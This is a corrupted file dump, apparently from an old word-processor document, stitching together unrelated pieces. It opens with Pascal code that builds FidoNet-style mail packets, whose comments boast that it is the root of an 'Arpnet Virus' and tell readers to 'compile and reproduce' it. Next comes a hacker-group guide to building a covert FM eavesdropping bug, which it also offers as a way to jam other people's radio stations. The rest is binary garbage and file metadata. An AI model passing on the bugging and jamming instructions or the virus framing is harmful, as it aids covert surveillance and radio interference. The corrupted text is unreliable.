RESET(p_info); {$I+} IF (IOresult = 0) AND (first_pk >=0) THEN CLOSE(p_info) ELSE BEGIN REWRITE(p_info); GETDATE(year,month,day,dow); GETTIME(hour,minute,second,hund); packet.year := year; packet.month := month; packet.day := day; packet.hour := hour; packet.minute := minute; packet.second := second; WITH packet DO BEGIN orig_net := default.net; dest_net := new_net; orig_node := default.node; dest_node := new_node; baud_rate := 1200; pk_ver := packet_version; prod_code := product_code; FILLCHAR(fill,SIZEOF(fill),0) END; WRITE(p_info,packet); CLOSE(p_info) END END; { The following code will construct the actual message that is to be transmitted. I'm sure some intelligent soul out there can figure out that this section of code can be replaced to transmit anything as the packet is a protocol level above the information actually being transmitted to the destination node... } ASSIGN(packets,default.database_drive + 'PK' + dual(tmp_ptr^.pk_num) + '.XMT'); RESET(packets); SEEK(packets,FILESIZE(packets)); temp := convert(mesg.org_time.date,rl); temp := day_of_week[rl MOD 7] + ' ' + dual(value(COPY(mesg.org_time.date,4,2))) + ' ' + month_of_year[value(COPY(mesg.org_time.date,1,2))] + ' ' 73  + dual(value(COPY(mesg.org_time.date,7,2))) + ' ' + dual(value(COPY(mesg.org_time.time,1,2))) + ':' + dual(value(COPY(mesg.org_time.time,4,2))) + NULL; write_int($0002); {Packet header} write_int(mesg.orig_node); {Originating node} write_int(mesg.dest_node); {Destination node} write_int(mesg.orig_net); {Originating net} write_int(mesg.dest_net); {Destination net} attr := mesg.flags AND $7413; {Zero required attributes} write_int(attr); {File attribute} {?} write_int($0000); {File transmission cost} write_line(temp); {Date/Time group} write_line(mesg.dest_user + NULL); {Who message is to} write_line(mesg.org_user + NULL); {Who it is from}; write_line(mesg.title + NULL); {Subject of message}; x := 0; WHILE (mesg_text[x + 1] <> '') AND (x < max_msg_entry) DO BEGIN INC(x); write_line(mesg_text[x] + CR); IF POS('Message ID: ',mesg_text[x]) > 0 THEN BEGIN temp := COPY(mesg_text[x],POS('Message ID: ',mesg_text[x]) + 12,9); tmp := convert(system_date,lrtmp); lrnum := lrtmp; insertvalueinbtree(pkfile,lrnum,temp) END END; write_line(mesg_text[x + 1] + NULL); write_int($0000); {End of packet} CLOSE(packets) END; {---THIS IS JUST FOR FUN BETTER TO LEAVE OUT UNLESS YOU WANT TO TRAIL--} BEGIN openwindow(40,5,76,15,'Mail packet construction',YELLOW,back,4); setcolor(fore,back); writest('Constructing transmission packets',2,2); WRITELN(log_file,'Making the mail packets...',system_date,' ',system_time); node_c := NIL; msg_counter := 0; ASSIGN(mesg_dir,default.msg_drive + msg_file_dir); {$I-} RESET(mesg_dir); {$I+} IF IOresult <> 0 THEN BEGIN WRITELN(log_file,'I can''t open the message directory!'); writest('ERROR: Cannot open the message directory',2,4); EXIT END; t1 := 9; { Note: This is the networking base } REPEAT SEEK(mesg_dir,t1); READ(mesg_dir,mesg); t1 := mesg.dir_link; t2 := mesg.sub_dir_link; WHILE t2 > 0 DO BEGIN SEEK(mesg_dir,t2); 73  READ(mesg_dir,mesg); t2 := mesg.dir_link; t3 := mesg.sub_dir_link; IF t3 > 0 THEN BEGIN SEEK(mesg_dir,t3); READ(mesg_dir,mesg); t3 := mesg.sub_dir_link; SEEK(mesg_dir,t3); READ(mesg_dir,mesg); REPEAT IF (mesg.dir_type = message) AND test_bit(msg_bit + (t3 DIV 1024),t3 MOD 1024) AND bit(mesg.flags,8) OR bit(mesg.flags,5) THEN BEGIN read_for_edit(default.msg_drive + msg_msg_dir,mesg.msg_link,mesg_text); more := FALSE; new_net := 0; new_node := 0; REPEAT fwd := FALSE; get_route_info(mesg.dest_net,mesg.dest_node, new_net,new_node,fwd,more); get_node_info(new_net,new_node,destnode); i := 1; seen := FALSE; REPEAT IF POS('Message ID:',mesg_text[i]) > 0 THEN seen := TRUE; IF (POS(' ' + destnode.serial_num,mesg_text[i]) > 0) AND seen THEN i := 0 ELSE INC(i) UNTIL (i = 0) OR (POS(#$FF,mesg_text[i]) > 0); IF (i <> 0) AND ((NOT bit(mesg.flags,5) AND fwd) AND bit(mesg.flags,8)) AND NOT ((new_net = 0) AND (new_node = 0)) THEN BEGIN writest('Packet to Net/Node: ',2,4); WRITE(new_net,'/',new_node,' ',destnode.serial_num,' '); writest('Title: ' + mesg.title,2,5); CLREOL; construct_packet(new_net,new_node) END UNTIL NOT more; mesg.flags := mesg.flags OR $0020; SEEK(mesg_dir,t3); WRITE(mesg_dir,mesg) END; t3 := mesg.sub_dir_link; SEEK(mesg_dir,t3); READ(mesg_dir,mesg) UNTIL mesg.dir_link < 0 END 73  END; UNTIL t1 <= 0; GOTOXY(2,4); CLREOL; CLOSE(mesg_dir); ASSIGN(email_dir,default.email_drive + email_file_dir); {$I-} RESET(email_dir); {$I+} IF IOresult <> 0 THEN BEGIN WRITELN(log_file,'I can''t open the email directory!'); writest('I can''t open the email directory!',2,4); EXIT END; {-------------CAUGHT SO WHAT DO YOU DO...DOESN'T MATTER DOES IT?--------} WHILE NOT EOF(email_dir) DO BEGIN READ(email_dir,email); IF test_bit(email_bit,FILEPOS(email_dir) - 1) AND bit(email.attrib,0) AND NOT bit(email.attrib,5) THEN BEGIN more := FALSE; fwd := TRUE; get_route_info(email.dest_net,email.dest_node,new_net,new_node,fwd,more); get_node_info(new_net,new_node,destnode); IF (new_net <> 0) OR (new_node <> 0) THEN BEGIN read_for_edit(default.email_drive + email_msg_dir, email.msg_link,mesg_text); writest('Packet to Net/Node: ',2,4); WRITE(new_net,'/',new_node,' ',destnode.serial_num,' '); writest('Name: ' + email.dest_name,2,5); CLREOL; mesg.orig_node := email.org_node; mesg.orig_net := email.org_net; mesg.dest_node := email.dest_node; mesg.dest_net := email.dest_net; mesg.flags := email.attrib; mesg.dest_user := email.dest_name; mesg.org_user := email.org_name; mesg.title := '|/\|'; construct_packet(new_net,new_node) END; email.attrib := email.attrib OR $0020; SEEK(email_dir,FILEPOS(email_dir) - 1); WRITE(email_dir,email) END END; CLOSE(email_dir); WRITELN; CLREOL; {---------PUNISHMENT I WANT TO KNOW WHERE IT GOES BETTER LEFT OUT------} writest('Packets constructed: ' + strval(msg_counter),7,7); IF paramstr(1) = '' THEN BEGIN writest('Press any key to continue',6,8); hidecursor; 73  ch := readkey; IF ch = #0 THEN ch := readkey; showcursor END; closewindow(4); WRITELN(log_file,'Done making the packets. Constructed: ',msg_counter) END; {---RIGHT LOOKS GOOD AND USEFULL COMPILE AND REPRODUCE AND REPRODUCE----} END. {Above code: Is a GMPFU@C, Gone Made from UnderGrad @ College -Program 87} {->Arpnet Virus:attachments must be modified,take out the write statements for} {better effect and code speed, this is the root of the virus without any } {destructive tendencies......hehehe} {ShadowSpawn cc @wiskiesour@.988, ACTUALLY MY NAME THIS WEEK IS GEORGE BUSH} {--------------------------------------------------------------------------} {It gets better, wait till election Day!!!!!!!...better close your.........} %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% <> How to make an FM wireless BUG <> %% %% By: <-> Johnney Rotten <-> %% %% <> A Cryptic Criminals/Elite Justice Society presentation <> %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%What it is----------This handy little device can be used for two purposes. The first is a FM bug,which transmits on the FM frequency, thus making it extremely easy to pick up.The second is a FM station blocker (which can be really fun if you are pissedat someone who just happens to be listening to the radio. In this case, you can do 1 (or both) of these: A) announce through the bug (on their station)that Fred (whoever is listening) has just won 1 years supply of orthopedicshoe pads, or B) disconnect the mike, and let it fry the station.) In thisfile, I will make some incredibly lame schematics, which any fool can follow,(lets see you make good schematics with Apple Writer), and tell you all thejunk you need (duh..) Ok, if you have no electronics background at all, goahead and try it anyways (hell, it's not my money your wasting on parts) Required Parts--------------(1) 2n3904 transistor............................[Q1](1) 10k resistor (+-5%)..........................[R1](1) 4.7k resistor (+-5%).........................[R2](1) 1k resistor (+-5%)...........................[R3](1) .001 uf capacitor............................[C1](1) 5 to 80 pf variable capacitor................[C2](1) 10 pf capacitor..............................[C3](2) .5 uh coils..................................[L1,L2](1) SpSt slide switch............................[S1](1) 9 volt battery clip..........................[B1](1) Antenna or antenna wire (3 in. or more)......[A1](1) microphone (like one out of a phone).........[M1]Schematics---------- --------------*-------------*-------------*-------------* | | | | | | | | | | +A1 | | | | L1 | S1 R1 | C2 | | | | | | *---- | | | | | + | | | L2 B1 | | | | - | C1 |  |xxuUVltJ2bEz{LM7  g J g h j z {  a !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- @ (x_^:;:;$YZRklEF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-0YZ!"j Y0xG$e,m)QR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-<w:y = y !T!!!"L"""#?#@#A###)$o$y$$$$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-$$ %[%%%%%%*&\&]&&&&-'u''((O(((-)i)j)k))))))I*o*p*q****$+o++,,,,!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-,.,B,C,N,O,, -?-c------.#.<.b.c.d.o.p....1/~//0h00000 1Z111111122a2!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-a222I33344z4{44448555#6r6666'7w778`888899N999999:I:::;;;; ;!;!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!;";#;$;%;8;9;:;K;;;<]<<<<<<<7=u=====7>{>>?G?????@T@@+ApAAABB%BiBB!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-BB2CqCCCCCCCCCCCC4DrDsDDDETEEEQIQSQmQQQ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Q3RwRRR?SSS T?T@TJTSTeTTT'UUUBVVVVVVVVVVWWSWWWWWWWWWWXAXkXlXX!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-X YXYYY?ZMZNZOZPZcZdZoZpZZZZZZZZZ.[n[[[%\k\l\x\y\z\{\|\}\~\\\\\E]]] ^1^2^!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-2^O^l^^^^ _U___7```acaaaDbbb'coccccd*dsddeQeeeeeeeeeeeeeeee!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-ee fRfff(g3g}ggg-hhhi8i~iiii j&jljjjBkkkl`lll2mzmmnJn|n}nnnn oKooo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-o pIpgppppppqqqdqqqqqrbrrrrJsssss8t~ttttttttttttuOuuu#vGv!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-GvHvXvYvvv,wrwwxxxxZxxx$y%y&y'yRySyyyyyy2z}zzm{{ |U|||;}b}c}v}w}}~_~~~!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-~G.|ˀـڀ8ʁ 34Ȃ78RS9҄=օ&uR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-@߈*xȉfN2Ό]^3͎iUѐ jƑǑZCד!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-דDٔ(w [@ؗ#qƘǘ\Bؚ Cwxyz{|țb!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-%&Lst<ڞӟ#o ZF5ң!l OPQRSTUVW!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-WXYZvw^12ͧgN2CDEFuӪ1`aԫ$OP/9:Od!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-dDخ&r¯ XE/t /0;[{߳*+yɴEF]t!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- ¶[4иj Y>ػ&ABkǼȼb!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-%&'s:ѿdMfgy ARSi 1Hq./7T!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Tq34Rx,u&!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-9"/01F[HV*z<_I[!"#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-#:QG` EF'(IJ+w U6778!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-89_`=k?@q@A<=XY0yzN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-^-r67{6rs@67~BCU0u !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- Q$eE36>?(r2,-v!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-v7}P f=Z)pL=>PRS%c-r!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-r'd>{ Amd9`ab3456}X!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-,qN% 4 5 ? T i p   S           ) 5 > J K   # h   1 2 3 4 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-4 5 6 ? P Z {          "CLe3Qfw%S!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-SXb%5:DUhx} >_}!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-4BRWat~!,?HOZgsZbm!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-'7<E]jz -2@YrH]^fmu!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-u}*w(vGXYab?pqrstuv H}!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-,w&'u    ] i x     !H!!!!!D""""""##b##$5$6$7$8$$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-$$"%Q%R%S%p%%%%%% &@&F&L&R&{&&&&&&'-'G'R'u'''''(&('((()(W(X(~(()$)%)i)j)!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-j)))*A*o*p******5+u+++++++++%,f,,,,,,,#-X-~-----.k........!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-./ / / ///j//0Q0n0o0p0q0000 1-1Q1u1v11112*2+2Q2w2222 3 303T3x33333 4-4Q4!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Q4u4v44458595]55555566676[6666666797:7^7777778=8a8b8888899;9a99!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-99999:<:=:a::::::J;K;o;;;;;<*<N<r<<<<<<<<<.=}====)>w>> ? ?[???!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-?E@@@@@:AAAAA;Bjjjjjj;kkk"lmlnlllm?mmm!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-mn_nnn(ooooo>pppp.qsqqrHr|r}r~rrsdsssKttttCuuu.v|vvvv-w{V{{{{{!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-{{{{{{{|/|A|B|C|j|k||| }X}}}~ ~ ~ ~~~7~O~g~w~x~y~~~~~1Iay!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Skl89rR‚Q XȄ=CDEͅ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-ͅ23φl,-RIa01}ʋPΌ`vwō`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-`HIҏӏ nu3-yȒeǓ-abDEVW<і!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-      !"#$%&'()*+,-./01234567:;<=>?@ABCDE<=ST̗e7qؙ;{ǚȚf!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-;ԝlS;֠ !<`աi34OP:٤$t]?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-ܧ)y!"45ԩ$pZݫޫ./012345678XY:ҭ nR!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-7հ"m~˱_Eݳ,{gɵʵֵ-{ɶcIŸ_!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Brs~ӺjR6ѽnT:MNPQpq,tcH!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-_]H2~a:;VWC9i!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-;=l^0rB =>T$j!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-=UV\|J`3yDX%k.`a!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-/u%&VWdDK23~eM9!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-kM> p X9't<=#eN3GH5!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-5#r V='w]%qR8l.\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-2r%XZ[+1a-9Zn!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-2k'(w U   7    p   Z     ^       [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-b9:@ABCD_k;%]^oG>fg5!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-56<=56DLab\]gPA)x!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-$rE W: 8 9 :   !!o!!"P"z"{""""!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-"""" #)#F###$2$S$m$$$%K%j%%%%&(&_&&&'D''''(;(y((()?)@)))*.*/*7*S*o*!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-o***********=+++,M,x,y,,-Z-[---..Z......//*/+/v///////B0C0D0!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-D0000111`1o1p11111112?2@2222233333333333 4W444?55556P666;7!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-;7777777777777I88888199999L::::;a;;;2<3<<<== >S>>>??f??@!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-@S@@@)A*AtAAB_BBBCCCCC8CTCpCqCC DVDDD8E@EAEEE,F{FFGWGXGGG7HHH#InIII!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-IIJJ.KzKKKLL!L"L#L$L%L&L'L(L)L*L+L,L-L.L/LPLQLRLLLMM'MGMkMMMMMMMMN%N;NQN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-QNlNNNNNNN O#O4OEOVOgOOOOOOP>PVPtPuPP Q*Q+Q,Q-Q.Q/Q0QOQoQQQQQQQR%R}}}}}}$~=~c~~~~~ X'qȀɀ]-˂=у?@Ԅh!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-45Ɇ]‡Ç W?YZz{ωЉB89BC!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-CST^_  5jGގ-u^Eߑ*zƒf!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-V7fghz{ÖՖ3ӗ i0uv5КV<!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-<Ҝۜ+yɝeݞ  78ՠZ[D:ȣd=!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-ƥǥߥ/}Ħڦ)6>IYZҧ!_ĩũ:;Fh!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-˪֪ު:׫m 4ƭ߭  X>گ)q (xƱDZ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-DZױر6ABM[wI/{?XYk̵յֵصٵ012EK!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- WKLeqG"#;F,23Igh»]C!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- !"01ž^jkuvÿdF;z{.|d2!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-234DE@AQR7cdefvw =  ]>?@]^B!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-$qTeFF;%&'CD+_`E!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!- #$ghijklmnopq2f$rZCl!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Q5ef!KLu;%Dc ,JK-{!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-W;Z[\MEFpq X7n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-iK2RS=opq%r XTU=&u!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-"/0}hISTanP9#LMNr/LM!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-H0~$%&CD O,01NO=!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-B$()k+:P[ew)69!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-9:MWYZacmvxyz= RZ[stYZxS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-S# o       a    >   # g h           - I {        !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-Q9jGHRS')*v^_#./no!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-  $%o Y !o89JK _A)w^N!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-7    : ; \ }    +!u!!"Y""""##/#0#m#n####$$F$$$"%9%:%%%&e&&&!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-&''%'&'m' (U((((7)}))**Q****0+{++++$,n,,---0-1-^-s-------- ...-.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!--.<.T.l.m.y..........//1/2/3/>/?/`////////00;0e0y00000001-1B1M1O1P1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-P1]1o1111111111111111112H2~223\3]33334]44444 5 5U555366677!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-7^777778C8D888!9f99999::3:4:8:9:h:i::::;X;;;2<<=e=f===F>>>>?_??!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-??9@@@A^AxAyA{A|AABIBBBBBBC$CsCCCCCD,DIDfDDDDDDE.EKEhEEEEYFvFFF!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-FFFF G2GLGWGsG{GGGGG H,HEHaHHHHHII'I=I]IIIIJJJ]JjJJJJJJJJK0KIKbK!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-SummaryInformationKR+?(10q]q]732654& YWW\PqFJuHXX,,]|Wz[2#&/[uF]L|@7F (y @ 4k#@#%4@ 4Vo+N]0q]FDFDID%3]G54_N_@)&u8J @ 4k#@@ 4]<?XiXXXX!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-XYYZYrYYYZZSZsZZZZ[[![f[p[[[[[[7\N\i\z\\\\\\]%]J]]]]^ ^1^C^M^a^^!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-^^^^ __L________ `F`f````a>aKasaaaaaaab'b?b_b}bbbbbbc3c?cycccc!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-c d/dLdddddd8egeeeee#fbfffff g2gRgyggggghLhhhnhvhhhhh*iFiRi~iiiii!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-iiiIjNjjjj9kkkkClllllx!!!!!!!!!!!!!!!!!K@Normala "A@"Default Paragraph Fontf!!!!!!!!                      ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ ` a b c d e f o'.%8@JSYbm$v8{ZS"66  Hv7!p'q-39*BJ SZdpwa|_k \/'.I5@IN*T^ijRuBݛߪe7 .}&?,0f:CIGPX?_FfH<  1    N!OJ%H 3 !")#%$"%,&Q'()*J+9,-.M/50Q1I2N3J4N56M7O8+9Q:P;<P= >?I@PABCED7ENFKGKHILJKLMN"OPKQMR0S8TUOVW3X(YZ[H\"]^K_`a8b>c!d ex $,a2!;BBJQX2^eoGv~דWdT#8 vr4 Su$j).Q49?G_N!VB\emw{ͅ`55"o*D0;7@IQNcR*W`4hs`|C<DZ29S&-.P17?FbK7PX^cix      !"#$%&'()*+,-./012345,James E. CrawfordC:\STORAGE\ANACOOK2.TXT@Epson LQ-2550LPT1:EPSON24Epson LQ-2550  DLn dRX Epson LQ-2550  DLn dRX 1Times New Roman Symbol &Arial"hх$6James E. CrawfordJames E. Crawfordࡱ